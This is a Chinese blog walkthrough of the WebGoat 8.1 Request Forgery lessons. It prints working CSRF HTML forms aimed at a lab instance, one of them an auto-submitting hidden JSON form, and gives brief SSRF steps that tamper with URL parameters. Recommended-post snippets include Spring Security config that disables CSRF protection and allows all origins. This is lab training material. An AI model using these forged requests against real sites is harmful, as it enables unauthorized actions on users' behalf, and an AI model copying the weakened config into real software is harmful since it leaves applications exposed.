WebGoatV8.1(A8 2013Request Forgery)详细过关教程

已于 2022-08-29 16:27:08 修改
阅读量535 收藏 2
点赞数
分类专栏: 靶机 文章标签: 前端 安全
于 2022-08-29 16:09:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51566481/article/details/126585829
版权

一、Cross-Site Request Forgeries

1.Basic Get CSRF Exercise

根据题目提示说有隐藏表单,找到代码,右击form标签,复制->整个html

 黏贴到编辑器上面并且补全html代码 和action指定的url,保存后修改后缀为html

<html>
<body>
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" successcallback="" action="http://192.168.3.88:8080/WebGoat/csrf/basic-get-flag">
        <input name="csrf" type="hidden" value="false">
        <input type="submit" name="submit">
    </form>
</body>
</html>

我这里为了方便没有用http,直接打开编写好的html文件提交,获得flag 

2.Post a review on someone else’s behalf 

这题和上一题的步骤也差不多

 黏贴到编辑器上补齐,后改后缀名

<html>
<body>
<form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form" successcallback="" action="http://192.168.3.88:8080/WebGoat/csrf/review">
                                <input class="form-control" id="reviewText" name="reviewText" placeholder="a" type="text">
                                <input class="form-control" id="reviewStars" name="stars" type="text">
                                <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
                                <input type="submit" name="submit" value="Submit review">
                            </form>
</body>
</html>

打开后输入,提交。回到webgoat刷新一下,已经有新的评价出现

3.CSRF and content-type

这一题根据题目给出的提交表单进行构造html来提交表单。

而且提交的格式是xml,这里涉及到编码转化的问题,不过题目里面的here跳转的页面已经很好的帮我们解决这个问题,也就是添加一个属性

ENCTYPE="text/plain"

构造的html代码

<html>
    <script>
        window.onload = function() {
        document.getElementById("submit").click();
        }
    </script>   
	<body>                            
		<form class="attack-form" accept-charset="UNKNOWN" id="csrf-feedback" method="POST" preparedata="feedback" action="http://192.168.3.88:8080/WebGoat/csrf/feedback/message" contenttype="application/json" ENCTYPE="text/plain">
			<input type="hidden" name='{"name": "WebGoat","email":"webgoat@webgoat.org","content":"WebGoat is the best!!' value='"}'>
            <input id="submit" type="submit" value="Submit request" style="display:none"/>
		</form>
	</body>
</html>

二、Server-Side Request Forgery

1.Change the URL to display Jerry

设置代理抓包

url值里面的tom改成jerry,放包。即可过关

2.Change the URL to display the Interface Configuration with ifconfig.pro

让我们改成使用ifconfig.pro接口,我们直接访问ifconfig.pro看看这个接口的整个url。有url就简单了

直接抓包改url的值就可以了

  也可以直接在浏览器上面该value值提交

spade.nine
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebGoat8 M17 CSRF 题解
伊维泽诺流浪记
03-12 956
目录 什么是CSRF? 题目3 Basic Get CSRF Exercise 题目4 Post a review on someone else’s behalf 题目7 CSRF and content-type 题目8 Login CSRF attack 什么是CSRF? CSRF,Cross-site request forgery,跨站请求伪造。 一个CSRF攻击大...
WebGoat 2023靶场搭建Broken Access Control通关
apple_51763401的博客
10-14 630
WEBGOAT2023靶场第一关
WebGoatV8.1(challenges)详细过关教程
weixin_51566481的博客
08-29 956
WebGoat
Web安全入门之WebGoat8.0环境搭建
最新发布
VN520的博客
04-01 1279
WebGoat是OWASP维护的,用于进行WEB漏洞测试和学习的JAVA应用程序。
webgoat-Request Forgeries 请求伪造
seanyang_的博客
11-07 567
跨站请求伪造,又称一键攻击或会话骑乘,简称CSRF (有时发音为 sea-surf)或 XSRF,是一种恶意利用网站,其中传输未经授权的命令 来自网站信任的用户。与跨站点脚本 (XSS) 不同,XSS 利用用户对特定站点的信任,CSRF 利用网站对用户浏览器的信任。这是最简单的 CSRF 攻击。如果用户仍然登录到 bank.com 的网站,这个简单的GET请求会将资金从一个账户转移到另一个账户。当然,在大多数情况下,网站可能很多控制来限制这样的请求。
代码审计(Java)——WebGoat_RequestForgeries
weixin_45260839的博客
09-16 302
代码审计(Java)——WebGoat_RequestForgeries
Webgoat8通关笔记(1)
weixin_44689968的博客
06-01 3381
(A1)SQL Injection(intro) X-02 本题:查看示例表,尝试检索员工Bob Franco所在部门。主要考察sql语句的查询 (1)select department from employees where first_name=‘Bob’; (2)select department from employees where last_name=‘Franco’; x-03 本题:把‘Tobi Barnett’的部门改成销售部。 update employees set departm
SSRF(Server Side Request Forgery,SSRF)漏洞.pdf
07-05
讲述服务端请求伪造(Server Side Request Forgery,SSRF)攻防
Robust Defenses for Cross-Site Request Forgery
09-29
Cross-Site Request Forgery (CSRF) is a widely exploited web site vulnerability. In this paper, we present a new vari- ation on CSRF attacks, login CSRF, in which the attacker forges a cross-site ...
CSRF(英语:Cross-site request forgery)浅析.md
01-26
CSRF(英语:Cross-site request forgery)浅析.md
DCT_forgery_dct_
10-02
DCT MATLAB CODE FOR IMAGE FORGERY
wildfly-8.1.0.Final.rar
03-21
开发工具 服务器 wildfly-8.1.0.Final.rar 开发工具 服务器 wildfly-8.1.0.Final.rar
WebGoat教程解析
05-09
WebGoat里面关于会话劫持(Hijack a Session)这个课程的标准答案里面除了使用WebScarab以外还使用了其他的工具来找出合法的SessionID以完成这个课程,实际上这个课程完全可以只使用WebScarab来完成。
浅析Go语言版本的forgery
09-20
在Python中,`forgery_py`是一个流行的数据伪造库,提供了丰富的数据生成器,如地址、颜色、货币、日期等。然而,对于Go语言的开发者,可能找不到直接对应的库。本文将探讨如何理解并实现一个Go语言版本的类似库——...
Web Security 之 Server-side request forgery
bluemoon_0的博客
01-14 546
Web Security 之 Server-side request forgery
Alloy Tutorial(1)Alloy 基本使用
qq_42902997的博客
06-11 1176
这个谓词的含义更为广泛,它实际上描述的是一个连通图,连通图的特性就是对于所有的节点对,至少存在一条边使得这两个节点是连通的。注意,这并不意味着图是无向的,因为它并未要求如果存在从u到v的边,那么必须存在从v到u的边。这个谓词表示在图 g 中,对于所有的节点 u 和 v,都存在从u到v的边,并且从v到u的边。这个谓词实际上在描述一个无向图,因为无向图的特性就是如果存在一个从u到v的边,那么必须存在一个从v到u的边。这种逻辑符号进行连接是肯定不对的。这个谓词表示在图g中,
webgoat全关教程手册
热门推荐
黑白的博客
11-08 5万+
Webgoat&Webwolf owaspbwa里面的两个服务 搭建 先要安装jdk、Webgoat和Webwolf Webgoat和Webwolf jdk1.8不支持了,需要安装jdk11 去git上下载Webgoat和Webwolf https://github.com/WebGoat/WebGoat/releases/tag/v8.0.0.M26 去oracle官网下载JDK https://www.oracle.com/java/technologies/javase-jdk11-down
WebGoat通关教程
锋刃科技的博客
05-05 1万+
这里我们用docker镜像一键搭建即可 用docker命令开启webgoat docker run -d -p 8081:8080 -p 9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf 打开192.168.109.131:8081/WebGoat和192.168.109.131:9090/WebWolf能打开即可 192.168...
CSRF(get)实验演示
weixin_44749329的博客
05-21 2379
首先打开CSRF(get) 1.登录我们自己设置的购物网站,点击“提示”可以看到。 登录的时候可以来到个人中心,可以看到自己的个人信息,如果可以改他的住址直接改就可以了,点击“提交”,这个地址就改了 2.确认我们的网站是否有CSRF漏洞:首先敏感信息的修改,我们可以通过bug信息的数据包来看一下 3.把get请求复制一下,粘贴到编辑器,我们可以看到这个请求是向后台发送了这些信息的参数,然后...
springboot security 如何设置Access-Control-Allow-Origin
05-26
在Spring Boot中,可以通过配置WebSecurityConfigurerAdapter来设置Access-Control-Allow-Origin。以下是一个示例: ```java @Configuration @EnableWebSecurity public class SecurityConfig extends WebSecurityConfigurerAdapter { @Override protected void configure(HttpSecurity http) throws Exception { http.csrf().disable() .cors() .and() .authorizeRequests() .antMatchers("/api/**").permitAll() .anyRequest().authenticated() .and() .httpBasic(); } @Bean public CorsConfigurationSource corsConfigurationSource() { CorsConfiguration configuration = new CorsConfiguration(); configuration.setAllowedOrigins(Arrays.asList("*")); configuration.setAllowedMethods(Arrays.asList("GET", "POST", "PUT", "DELETE", "OPTIONS")); configuration.setAllowedHeaders(Arrays.asList("Content-Type", "Authorization")); UrlBasedCorsConfigurationSource source = new UrlBasedCorsConfigurationSource(); source.registerCorsConfiguration("/**", configuration); return source; } } ``` 上述代码中,我们首先禁用了Spring Security的CSRF保护,然后启用了Cors配置。在corsConfigurationSource()方法中,我们设置允许所有来源(allowedOrigins)的请求,允许的HTTP方法(allowedMethods)为GET、POST、PUT、DELETE和OPTIONS,允许的请求头(allowedHeaders)为Content-Type和Authorization。最后,我们将Cors配置注册到所有URL上。 这样就可以在Spring Boot中设置Access-Control-Allow-Origin了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值